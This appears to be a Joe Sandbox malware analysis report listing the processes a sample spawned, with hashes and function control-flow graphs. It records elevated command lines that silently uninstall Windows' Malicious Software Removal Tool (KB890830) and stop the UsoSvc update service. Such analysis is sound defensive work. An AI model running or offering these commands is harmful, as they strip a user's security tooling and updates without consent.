                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:45
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                          Start time:10:27:01
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5788 -s 3120
                                                                                                                                                                                          Imagebase:0x7ff7526e0000
                                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                          Start time:10:27:06
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                          Imagebase:0x7ff7fb730000
                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                          Start time:10:27:07
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                          Imagebase:0x7ff645240000
                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                          Start time:10:27:07
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                          Imagebase:0x7ff73eb10000
                                                                                                                                                                                          File size:72'192 bytes
                                                                                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                          Start time:10:27:07
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                          Start time:10:27:07
                                                                                                                                                                                          Start date:28/03/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Disassembly

                                                                                                                                                                                          Reset < >

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:18.3%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                            Total number of Nodes:3
                                                                                                                                                                                            Total number of Limit Nodes:0
                                                                                                                                                                                            execution_graph 13411 7ffaac254e49 13412 7ffaac254e57 VirtualProtect 13411->13412 13414 7ffaac254f1e 13412->13414

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00007FFAAC25FA60 Relevance: 1.8, Strings: 1, Instructions: 564COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1155 7ffaac25fa60-7ffaac25fa86 call 7ffaac25c420 1158 7ffaac25facf-7ffaac25fb02 1155->1158 1159 7ffaac25fa88-7ffaac25fa93 1155->1159 1165 7ffaac25fb09-7ffaac25fb17 1158->1165 1166 7ffaac25fb04 call 7ffaac25c420 1158->1166 1160 7ffaac25fab9-7ffaac25fac2 1159->1160 1161 7ffaac25fa95-7ffaac25fa98 1159->1161 1162 7ffaac25fab0-7ffaac25fab7 1161->1162 1163 7ffaac25fa9a-7ffaac25faae 1161->1163 1162->1160 1162->1161 1163->1162 1170 7ffaac25fac3-7ffaac25face 1163->1170 1168 7ffaac25fb19-7ffaac25fb24 1165->1168 1169 7ffaac25fb93-7ffaac25fbd9 1165->1169 1166->1165 1171 7ffaac25fb4a-7ffaac25fb83 1168->1171 1172 7ffaac25fb26-7ffaac25fb29 1168->1172 1186 7ffaac25fbdb-7ffaac25fbf9 1169->1186 1187 7ffaac25fc23-7ffaac25fc41 1169->1187 1173 7ffaac25fb41-7ffaac25fb48 1172->1173 1174 7ffaac25fb2b-7ffaac25fb3f 1172->1174 1173->1171 1173->1172 1174->1173 1180 7ffaac25fb86-7ffaac25fb92 1174->1180 1193 7ffaac25fc8b-7ffaac25fcd9 1187->1193 1194 7ffaac25fc43-7ffaac25fc56 1187->1194 1200 7ffaac25fcdb-7ffaac25fcf8 1193->1200 1201 7ffaac25fd22-7ffaac25fed9 1193->1201 1194->1193 1204 7ffaac25fcfa-7ffaac25fd16 1200->1204 1205 7ffaac25fd19-7ffaac25fd21 1200->1205 1234 7ffaac25ff20-7ffaac25ffbd 1201->1234 1235 7ffaac25fedb-7ffaac25fef9 1201->1235 1204->1205 1205->1201 1247 7ffaac25ffbf-7ffaac25ffcc call 7ffaac257858 1234->1247 1249 7ffaac25ffd1-7ffaac25ffee 1247->1249
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: GM_^
                                                                                                                                                                                            • API String ID: 0-3996490851
                                                                                                                                                                                            • Opcode ID: ac718919961931fa7991d9d705cfb99d683507121144c105ecd59de8f98a7c23
                                                                                                                                                                                            • Instruction ID: 894d642dfdd6f1c95f73b0af6920f0f866d6d535ada1e74b265056d18e739b0f
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac718919961931fa7991d9d705cfb99d683507121144c105ecd59de8f98a7c23
                                                                                                                                                                                            • Instruction Fuzzy Hash: C9F11967A0E69A5EE361B77CB4614E63F90DF4333570882F7D0CDCA2A3DC19984A8391
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2565A8 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 88549654695c12ab4797a35198e24d794b049e415f415423ab4ba474ab428af6
                                                                                                                                                                                            • Instruction ID: 64907cfa838a3382713e6b29a4c8be9b318046f5512a7b79fee52a3df26ec026
                                                                                                                                                                                            • Opcode Fuzzy Hash: 88549654695c12ab4797a35198e24d794b049e415f415423ab4ba474ab428af6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 380209A5F1EF5A8FF6A9A72C485127576D2EF86610B4881BED40EC378BDD18EC0D42C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC256D79 Relevance: .4, Instructions: 375COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fecb2b9cb81187a2188bf4a613dc0f1313e9651e7d7a9bb1d5478ae820930c4b
                                                                                                                                                                                            • Instruction ID: 8758b05f5de1cb10a4c6b287851f5059b99d318ecd945be54fa1dafbdeff61d4
                                                                                                                                                                                            • Opcode Fuzzy Hash: fecb2b9cb81187a2188bf4a613dc0f1313e9651e7d7a9bb1d5478ae820930c4b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BB1057162A7898FE34DAB78451A5757FE0EF56620B0580FEC04ACB3A3DD1C9C0A8791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC39082B Relevance: 4.8, Strings: 3, Instructions: 1050COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 311 7ffaac39082b-7ffaac39082d 312 7ffaac39082e-7ffaac39083c 311->312 313 7ffaac390971-7ffaac390977 311->313 314 7ffaac390844-7ffaac390846 312->314 318 7ffaac390979-7ffaac390988 313->318 316 7ffaac3908b7-7ffaac3908c6 314->316 317 7ffaac390848-7ffaac390849 314->317 322 7ffaac3908c7-7ffaac3908c9 316->322 320 7ffaac39084b 317->320 321 7ffaac39080f-7ffaac39082a 317->321 319 7ffaac390989-7ffaac3909c0 318->319 326 7ffaac3909c2-7ffaac3909e7 319->326 327 7ffaac390a1c-7ffaac390a34 319->327 320->322 324 7ffaac39084d 320->324 321->311 322->313 325 7ffaac3908ca-7ffaac390908 322->325 328 7ffaac390894 324->328 329 7ffaac39084f-7ffaac390878 324->329 325->318 345 7ffaac39090a-7ffaac39090d 325->345 326->327 335 7ffaac3909e9-7ffaac390a00 326->335 328->313 333 7ffaac39089a-7ffaac3908b5 328->333 329->313 336 7ffaac39087e-7ffaac390891 329->336 333->316 339 7ffaac390a02-7ffaac390a1a 335->339 340 7ffaac390a71-7ffaac390a90 335->340 336->328 339->327 343 7ffaac390a92-7ffaac390a9b 340->343 344 7ffaac390a9c-7ffaac390aa7 340->344 343->344 349 7ffaac390aa9-7ffaac390ac0 344->349 350 7ffaac390adc-7ffaac390af4 344->350 345->319 348 7ffaac39090f 345->348 352 7ffaac390956-7ffaac390970 348->352 353 7ffaac390911-7ffaac390954 348->353 354 7ffaac390ac2-7ffaac390ada 349->354 355 7ffaac390b31-7ffaac390b67 349->355 353->352 354->350 363 7ffaac390b69-7ffaac390b80 355->363 364 7ffaac390b9c-7ffaac390bb4 355->364 366 7ffaac390b82-7ffaac390b9a 363->366 367 7ffaac390bf1-7ffaac390c28 363->367 366->364 373 7ffaac390c2a-7ffaac390c3a 367->373 374 7ffaac390c5d-7ffaac390c68 367->374 375 7ffaac390cab-7ffaac390cb9 373->375 376 7ffaac390c3c-7ffaac390c3e 373->376 380 7ffaac390c6a-7ffaac390c7b 374->380 381 7ffaac390c7c-7ffaac390c85 374->381 378 7ffaac390cba-7ffaac390cc4 375->378 376->378 379 7ffaac390c40 376->379 383 7ffaac390cd2-7ffaac390cfc 378->383 384 7ffaac390cc6-7ffaac390cc8 378->384 385 7ffaac390c42-7ffaac390c5c 379->385 386 7ffaac390c86-7ffaac390c87 379->386 380->381 381->386 395 7ffaac390d46-7ffaac390d4b 383->395 396 7ffaac390cfe-7ffaac390d23 383->396 388 7ffaac390d24-7ffaac390d32 384->388 389 7ffaac390cca-7ffaac390ccf 384->389 385->374 393 7ffaac391002-7ffaac391016 388->393 394 7ffaac390d38-7ffaac390d45 388->394 389->383 401 7ffaac391017-7ffaac391090 393->401 394->395 395->393 398 7ffaac390d4c-7ffaac390d5e 395->398 396->388 400 7ffaac390d5f-7ffaac390d7d 398->400 400->393 404 7ffaac390d83-7ffaac390d96 400->404 413 7ffaac391092-7ffaac3910c4 401->413 414 7ffaac391101-7ffaac391137 401->414 410 7ffaac390e07-7ffaac390e16 404->410 411 7ffaac390d98-7ffaac390d99 404->411 415 7ffaac390e17-7ffaac390e19 410->415 411->400 412 7ffaac390d9b 411->412 412->415 416 7ffaac390d9d 412->416 427 7ffaac391139-7ffaac391150 414->427 428 7ffaac39116c-7ffaac391184 414->428 415->393 419 7ffaac390e1a-7ffaac390e32 415->419 420 7ffaac390de4 416->420 421 7ffaac390d9f-7ffaac390dc8 416->421 435 7ffaac390ea3-7ffaac390eb0 419->435 436 7ffaac390e34-7ffaac390e37 419->436 420->393 426 7ffaac390dea-7ffaac390e05 420->426 421->393 430 7ffaac390dce-7ffaac390de1 421->430 426->410 432 7ffaac391152-7ffaac39116a 427->432 433 7ffaac3911c1-7ffaac3911c8 427->433 430->420 432->428 439 7ffaac391224-7ffaac39122a 433->439 440 7ffaac3911ca-7ffaac3911f7 433->440 437 7ffaac390eb3 435->437 436->437 441 7ffaac390e39 436->441 437->393 443 7ffaac390eb9-7ffaac390ecc 437->443 449 7ffaac39122c-7ffaac391244 439->449 448 7ffaac3911f9-7ffaac391210 440->448 440->449 446 7ffaac390e3b-7ffaac390e62 441->446 447 7ffaac390e80 441->447 461 7ffaac390f3d-7ffaac390f50 443->461 462 7ffaac390ece-7ffaac390ed2 443->462 446->393 455 7ffaac390e68-7ffaac390e7e 446->455 451 7ffaac390e82 447->451 452 7ffaac390e83-7ffaac390ea1 447->452 453 7ffaac391212-7ffaac391220 448->453 454 7ffaac391281-7ffaac3912be 448->454 451->452 452->435 453->439 455->393 455->447 463 7ffaac390f53 461->463 462->463 464 7ffaac390ed4 462->464 463->393 465 7ffaac390f59-7ffaac390fa6 463->465 466 7ffaac390f34-7ffaac390f3b 464->466 465->401 469 7ffaac390fa8-7ffaac390fad 465->469 466->461 469->466 471 7ffaac390faf 469->471 471->393
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1672459303.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac390000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: "9_$"9_$A
                                                                                                                                                                                            • API String ID: 0-572419098
                                                                                                                                                                                            • Opcode ID: 730837e9f8a5c855c75b0296959345139147ca18e7ef385893d81840fb905a95
                                                                                                                                                                                            • Instruction ID: 0ac8d6692cc6e5b5681e36b650a838a162bb116ec42c0007a29c099999efc7da
                                                                                                                                                                                            • Opcode Fuzzy Hash: 730837e9f8a5c855c75b0296959345139147ca18e7ef385893d81840fb905a95
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B62287180EB86CFF755DB68C8659A4BBE0FF56300F1441FEC08D9B192DA29A84AC7D1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC3913E9 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 1251 7ffaac3913e9-7ffaac391411 1253 7ffaac391413-7ffaac39144a 1251->1253 1254 7ffaac39144e-7ffaac391459 1251->1254 1253->1254 1256 7ffaac3914a3-7ffaac3914c5 1254->1256 1257 7ffaac39145b-7ffaac391489 1254->1257 1262 7ffaac3914c9-7ffaac3914d4 1256->1262 1259 7ffaac391535-7ffaac391545 1257->1259 1260 7ffaac39148f-7ffaac3914a2 1257->1260 1265 7ffaac391547 1259->1265 1266 7ffaac391548-7ffaac391560 1259->1266 1260->1256 1260->1259 1262->1259 1264 7ffaac3914d6-7ffaac391500 1262->1264 1281 7ffaac391502-7ffaac391503 1264->1281 1282 7ffaac391571-7ffaac391580 1264->1282 1265->1266 1267 7ffaac391562-7ffaac391569 1266->1267 1268 7ffaac3915b3-7ffaac3915c0 1266->1268 1272 7ffaac3915a6-7ffaac3915a7 1267->1272 1273 7ffaac39156b-7ffaac39156f 1267->1273 1270 7ffaac3915c2-7ffaac3915da 1268->1270 1271 7ffaac391631-7ffaac391638 1268->1271 1278 7ffaac3915dc-7ffaac3915f4 1270->1278 1275 7ffaac391694-7ffaac3916a8 1271->1275 1276 7ffaac39163a-7ffaac39167a 1271->1276 1277 7ffaac3915a9-7ffaac3915b0 1272->1277 1272->1278 1273->1282 1291 7ffaac3916aa-7ffaac3916ba 1275->1291 1292 7ffaac3916bc-7ffaac3916c9 1275->1292 1295 7ffaac3916eb-7ffaac3916f7 1276->1295 1296 7ffaac39167c-7ffaac39167e 1276->1296 1277->1268 1278->1271 1281->1262 1288 7ffaac391505 1281->1288 1282->1278 1287 7ffaac391581-7ffaac3915a5 1282->1287 1287->1272 1288->1287 1289 7ffaac391507-7ffaac391534 1288->1289 1291->1292 1299 7ffaac3916fa-7ffaac391710 1295->1299 1296->1299 1300 7ffaac391680-7ffaac391692 1296->1300 1304 7ffaac391712-7ffaac391767 1299->1304 1305 7ffaac39176c-7ffaac3917a3 1299->1305 1300->1275 1304->1305 1313 7ffaac3917a5-7ffaac3917b5 1305->1313 1314 7ffaac3917b7-7ffaac3917c1 1305->1314 1313->1314
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1672459303.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac390000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 6_
                                                                                                                                                                                            • API String ID: 0-719347557
                                                                                                                                                                                            • Opcode ID: b2068c115381e9a4582c27d773b52f534f50c25cda0f167ceae8154c023301b4
                                                                                                                                                                                            • Instruction ID: 16c03ed044cbcbac3743fdb64c48c3f3d98fce905a90cf8d3f86df384b73fdbe
                                                                                                                                                                                            • Opcode Fuzzy Hash: b2068c115381e9a4582c27d773b52f534f50c25cda0f167ceae8154c023301b4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD1587290EB868FE7519B3488659A4BFE0EF57300F0941FBD18DD71A2D92DA809C3E1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC254E49 Relevance: 1.6, APIs: 1, Instructions: 131memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                            • Opcode ID: a533fa8b8087cb7523ff6cf1289c0b12751a6e3a074f99739c3c5bb1b807a223
                                                                                                                                                                                            • Instruction ID: 9bc6062f0492856f3ab65240cd8c90e9ed0ff70e1217567ac93c8b03292d14b7
                                                                                                                                                                                            • Opcode Fuzzy Hash: a533fa8b8087cb7523ff6cf1289c0b12751a6e3a074f99739c3c5bb1b807a223
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B31E87190CB4C8FDB18EBAD98466FE7BE1EB95311F04826FE049D3256DE74A80587C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC3921F0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1672459303.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac390000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1affbf65b68d3b259d7dd66a5d4e23ca0ed937b46073080f29c59ab3c62c922e
                                                                                                                                                                                            • Instruction ID: ab1a24a431436a591912ca9c1dc4e43609a93a949ebb2802f9d0af2e60aee3ba
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1affbf65b68d3b259d7dd66a5d4e23ca0ed937b46073080f29c59ab3c62c922e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF0E171A0895DCFDFA5DA5CD844BDDB7B1FB68350F0081E6908DE3111DA30AAC58F91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC390330 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1672459303.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac390000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d2fd9b0cce0a37ffd34e14bef5f7544410b25d84736f6d46e71ee7a6e8383858
                                                                                                                                                                                            • Instruction ID: c4b51cde41340bc528d681ad3ffbdecd6ea1a469f1516a89e5fb835592c108dd
                                                                                                                                                                                            • Opcode Fuzzy Hash: d2fd9b0cce0a37ffd34e14bef5f7544410b25d84736f6d46e71ee7a6e8383858
                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E0C212B09E090FF7D8B6AD3CD4578A2D3DBD91113A851BFD00EC32AADC28CC4A8380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00007FFAAC257F28 Relevance: 12.1, Strings: 8, Instructions: 2102COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: }a$ }a$ }a$8ha$8ha$8ha$Xke$Xke
                                                                                                                                                                                            • API String ID: 0-1523566439
                                                                                                                                                                                            • Opcode ID: c2f99792113476fd30133be28930be7875b6ae3a383e1b3b9c40b6d6ae3dd346
                                                                                                                                                                                            • Instruction ID: c677dcd5879275fc2f36cb0d6d57cb25e222261c9fbb82ad7e404f93032ec5db
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2f99792113476fd30133be28930be7875b6ae3a383e1b3b9c40b6d6ae3dd346
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35D2F9B1A1DA1ACFFB98EB2C849567477D1EF65310B1581B9D00EC73AADD25EC0A87C0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25D4F5 Relevance: 4.1, Strings: 3, Instructions: 391COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LM_H$MM_H$qM_I
                                                                                                                                                                                            • API String ID: 0-586463873
                                                                                                                                                                                            • Opcode ID: b3c31fdc8c6dd07082568fd3f81feaea9c3a653d94f26d8a977d7c88ab4df071
                                                                                                                                                                                            • Instruction ID: 2faced62d82d236de5368f7367a5aaf3c07f611b852cdbf2a4baa9a335d9343f
                                                                                                                                                                                            • Opcode Fuzzy Hash: b3c31fdc8c6dd07082568fd3f81feaea9c3a653d94f26d8a977d7c88ab4df071
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BB11B57A1DA8A8BF758B37C64151F67791EF91225B4883BBD04ECA2DBED1CD80B42C0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC25E2B0 Relevance: 1.8, Strings: 1, Instructions: 525COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1671800821.00007FFAAC250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC250000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffaac250000_SecuriteInfo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: b4_
                                                                                                                                                                                            • API String ID: 0-3623245031
                                                                                                                                                                                            • Opcode ID: 6e29f0296a36022194cb634020a66b773699e04d6c1c0abd1e7a6a7cfbd20705
                                                                                                                                                                                            • Instruction ID: b2406271a7b09f610f0fe45dc210c425a22200c2c569cff4787eb0a583782c00
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e29f0296a36022194cb634020a66b773699e04d6c1c0abd1e7a6a7cfbd20705
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CE16BB1A1DA49CFF358EB1C9495171B3D0FB56310B14827ED08EC3A9ADE25E84B87C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

